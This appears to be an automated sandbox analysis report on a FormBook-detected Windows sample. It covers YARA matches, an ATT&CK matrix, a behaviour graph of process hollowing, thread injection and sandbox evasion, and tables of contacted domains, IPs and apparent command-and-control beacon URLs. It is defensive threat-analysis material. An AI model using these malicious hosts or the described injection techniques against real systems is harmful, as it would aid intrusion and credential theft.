          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918580029.0000000003510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.677567627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763395770.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432735 Sample: SKlGhwkzTi Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 29 www.adultpeace.com 2->29 31 adultpeace.com 2->31 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 6 other signatures 2->53 10 SKlGhwkzTi.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\SKlGhwkzTi.exe.log, ASCII 10->27 dropped 55 Tries to detect virtualization through RDTSC time measurements 10->55 57 Injects a PE file into a foreign processes 10->57 14 SKlGhwkzTi.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 17 help.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Tries to detect virtualization through RDTSC time measurements 17->43 23 cmd.exe 1 17->23         started        33 www.69-1hn7uc.net 163.43.122.119, 49769, 80 SAKURA-BSAKURAInternetIncJP Japan 20->33 35 biztekno.com 151.106.118.75, 49768, 80 PLUSSERVER-ASN1DE Germany 20->35 37 10 other IPs or domains 20->37 45 System process connects to network (likely due to code injection or exploit) 20->45 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SKlGhwkzTi.exe31%VirustotalBrowse
          SKlGhwkzTi.exe41%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.SKlGhwkzTi.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.SKlGhwkzTi.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          biztekno.com1%VirustotalBrowse
          adultpeace.com7%VirustotalBrowse
          www.69-1hn7uc.net1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG0%Avira URL Cloudsafe
          http://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.hiddenwholesale.com/p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.anewdistraction.com/p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          biztekno.com
          		151.106.118.75
          		truetrueunknown
          adultpeace.com
          		163.44.239.73
          		truetrueunknown
          www.69-1hn7uc.net
          		163.43.122.119
          		truetrueunknown
          www.cyrilgraze.com
          		104.21.65.7
          		truetrue
            		unknown
            cleanxcare.com
            		78.31.67.91
            		truetrue
              		unknown
              centergolosinas.com
              		192.169.223.13
              		truetrue
                		unknown
                pixie.porkbun.com
                		44.227.65.245
                		truefalse
                  		high
                  ext-sq.squarespace.com
                  		198.185.159.144
                  		truefalse
                    		high
                    www.hiddenwholesale.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.cleanxcare.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.anewdistraction.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.biztekno.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.centergolosinas.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.adultpeace.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.biztekno.com/p2io/?xN6x=IctutJlD1KzdQk/q9eJAOxuhjWEnlD6jXMe1IpO47rzJ4yHlcjfL6JMqKvIaYl5lDyXZ&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                		unknown
                                www.adultpeace.com/p2io/true
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		low
                                http://www.hiddenwholesale.com/p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cleanxcare.com/p2io/?xN6x=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.anewdistraction.com/p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsptrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.apache.org/licenses/LICENSE-2.0SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers/?SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bTheSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers?SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.tiro.comexplorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.goodfont.co.krSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.cyrilgraze.com/p2io/?xN6x=PONkgH6MO5ViGhelp.exe, 0000000D.00000002.919483231.0000000004052000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssSKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.carterandcone.comlSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sajatypeworks.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netDSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                		high
